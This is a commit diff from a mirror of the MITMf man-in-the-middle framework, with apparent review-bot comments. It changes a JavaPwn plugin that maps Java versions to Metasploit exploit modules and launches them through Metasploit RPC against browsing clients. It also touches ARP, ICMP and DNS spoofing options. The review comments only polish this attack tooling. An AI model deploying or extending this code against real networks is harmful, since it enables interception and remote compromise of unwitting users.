mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-07 13:32:18 -07:00
fixed errors in javapwn plugin and added config file
parent
9d860437c4
commit
c162833916
3 changed files with 28 additions and 11 deletions
|
@ -0,0 +1,5 @@
|
||||||
|
#Example config file for the javapwn plugin
|
||||||
|
1.702 = "java_atomicreferencearray"
|
||||||
|
1.704 = "java_verifier_field_access"
|
||||||
|
1.706 = "java_jre17_exec"
|
||||||
|
1.707 = "java_jre17_jaxws"
|
|
@ -1,13 +1,18 @@
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from plugins.BrowserProfiler import BrowserProfiler
|
from plugins.BrowserProfiler import BrowserProfiler
|
||||||
from time import sleep
|
from time import sleep
|
||||||
import libs.msfrpc
|
import libs.msfrpc as msfrpc
|
||||||
import string
|
import string
|
||||||
import random
|
import random
|
||||||
import threading
|
import threading
|
||||||
import logging
|
import logging
|
||||||
import sys, os
|
import sys, os
|
||||||
|
|
||||||
|
try:
|
||||||
|
from configobj import ConfigObj
|
||||||
|
except:
|
||||||
|
sys.exit('[-] configobj library not installed!')
|
||||||
|
|
||||||
class JavaPwn(BrowserProfiler, Plugin):
|
class JavaPwn(BrowserProfiler, Plugin):
|
||||||
name = "JavaPwn"
|
name = "JavaPwn"
|
||||||
optname = "javapwn"
|
optname = "javapwn"
|
||||||
|
@ -21,16 +26,20 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
self.msfport = options.msfport
|
self.msfport = options.msfport
|
||||||
self.rpcip = options.rpcip
|
self.rpcip = options.rpcip
|
||||||
self.rpcpass = options.rpcpass
|
self.rpcpass = options.rpcpass
|
||||||
|
self.javapwncfg = options.javapwncfg
|
||||||
|
|
||||||
if not self.msfip:
|
if not self.msfip:
|
||||||
sys.exit('[-] JavaPwn plugin requires --msfip')
|
sys.exit('[-] JavaPwn plugin requires --msfip')
|
||||||
|
|
||||||
|
if not self.javapwncfg:
|
||||||
|
self.javapwncfg = './config_files/javapwn.cfg'
|
||||||
|
|
||||||
#Correlates java versions with their relative exploits
|
self.javacfg = ConfigObj(self.javapwncfg)
|
||||||
self.javaVersionDic = {1.702: "java_atomicreferencearray",
|
|
||||||
1.704: "java_verifier_field_access",
|
self.javaVersionDic = {}
|
||||||
1.706: "java_jre17_exec",
|
for key, value in self.javacfg.iteritems():
|
||||||
1.707: "java_jre17_jaxws"}
|
self.javaVersionDic[float(key)] = value
|
||||||
#add your exploits here converting the max affected java version to a float (e.g. java version 1.7.05 => 1.705)
|
|
||||||
|
|
||||||
self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit
|
self.sploited_ips = [] # store ip of pwned or not vulnarable clients so we don't re-exploit
|
||||||
|
|
||||||
|
@ -39,7 +48,7 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
msf.login('msf', self.rpcpass)
|
msf.login('msf', self.rpcpass)
|
||||||
version = msf.call('core.version')['version']
|
version = msf.call('core.version')['version']
|
||||||
print "[*] Succesfully connected to Metasploit v%s" % version
|
print "[*] Succesfully connected to Metasploit v%s" % version
|
||||||
except:
|
except Exception:
|
||||||
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
sys.exit("[-] Error connecting to MSF! Make sure you started Metasploit and its MSGRPC server")
|
||||||
|
|
||||||
#Initialize the BrowserProfiler plugin
|
#Initialize the BrowserProfiler plugin
|
||||||
|
@ -166,11 +175,13 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
|
options.add_argument('--msfport', dest='msfport', default='8080', help='Port of MSF web-server [default: 8080]')
|
||||||
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
|
options.add_argument('--rpcip', dest='rpcip', default='127.0.0.1', help='IP of MSF MSGRPC server [default: localhost]')
|
||||||
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
|
options.add_argument('--rpcpass', dest='rpcpass', default='abc123', help='Password for the MSF MSGRPC server [default: abc123]')
|
||||||
|
options.add_argument('--javapwncfg', type=file, help='Specify a config file')
|
||||||
|
|
||||||
def finish(self):
|
def finish(self):
|
||||||
'''This will be called when shutting down'''
|
'''This will be called when shutting down'''
|
||||||
msf = msfrpc.Msfrpc({"host": self.rpcip})
|
msf = msfrpc.Msfrpc({"host": self.rpcip})
|
||||||
msf.login('msf', self.rpcpass)
|
msf.login('msf', self.rpcpass)
|
||||||
|
|
||||||
jobs = msf.call('job.list')
|
jobs = msf.call('job.list')
|
||||||
if len(jobs) > 0:
|
if len(jobs) > 0:
|
||||||
print '[*] Stopping all running metasploit jobs'
|
print '[*] Stopping all running metasploit jobs'
|
||||||
|
@ -180,5 +191,5 @@ class JavaPwn(BrowserProfiler, Plugin):
|
||||||
consoles = msf.call('console.list')['consoles']
|
consoles = msf.call('console.list')['consoles']
|
||||||
if len(consoles) > 0:
|
if len(consoles) > 0:
|
||||||
print "[*] Closing all virtual consoles"
|
print "[*] Closing all virtual consoles"
|
||||||
for b,i,p in consoles.items():
|
for console in consoles:
|
||||||
msf.call('console.destroy', [i])
|
msf.call('console.destroy', [console['id']])
|
||||||
|
|
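Review bot: The config loading added at `self.javacfg = ConfigObj(self.javapwncfg)` accepts whatever it finds: ConfigObj does not raise for a missing file by default, so an absent `./config_files/javapwn.cfg` silently produces an empty `javaVersionDic`, and a non-numeric key makes `float(key)` raise an uncaught `ValueError`. I would construct it with `ConfigObj(self.javapwncfg, file_error=True)` and report a bad key explicitly, e.g. `except ValueError: sys.exit('[-] Invalid version key in javapwn config: %s' % key)`. The default path is relative to the working directory, so which file is loaded depends on where the tool is launched; resolving it relative to the plugin file would make that deterministic. The new `try: from configobj import ConfigObj` block uses a bare `except:` although this same commit narrows another handler to `except Exception:`; `except ImportError:` fits here. The enclosing method begins and ends outside the hunks shown.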
|
@ -32,6 +32,7 @@ class Spoof(Plugin):
|
||||||
self.arp = options.arp
|
self.arp = options.arp
|
||||||
self.icmp = options.icmp
|
self.icmp = options.icmp
|
||||||
self.dns = options.dns
|
self.dns = options.dns
|
||||||
|
#self.dhcp = options.dhcp
|
||||||
self.domain = options.domain
|
self.domain = options.domain
|
||||||
self.dnsip = options.dnsip
|
self.dnsip = options.dnsip
|
||||||
self.dnscfg = options.dnscfg
|
self.dnscfg = options.dnscfg
|
||||||
|
@ -188,7 +189,7 @@ class Spoof(Plugin):
|
||||||
options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing')
|
options.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP Spoofing')
|
||||||
options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects')
|
options.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP Redirects')
|
||||||
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests')
|
options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Redirect DNS requests')
|
||||||
#options.add_argument('--dhcp')
|
# options.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using fake DHCP offers')
|
||||||
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
|
options.add_argument('--iface', dest='interface', help='Specify the interface to use')
|
||||||
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
|
||||||
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
|
options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
|
||||||
|
|
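Review bot: Both lines added in this file are commented-out code (`#self.dhcp = options.dhcp` and the expanded `# options.add_argument('--dhcp', ...)`), which is unrelated to the javapwn fix named in the commit title and leaves dead code in two places that would have to be re-enabled together. A single `# TODO: --dhcp option not implemented yet` comment next to the argument definitions would record the intent without the risk of uncommenting one line and not the other. Both enclosing methods continue outside the hunks.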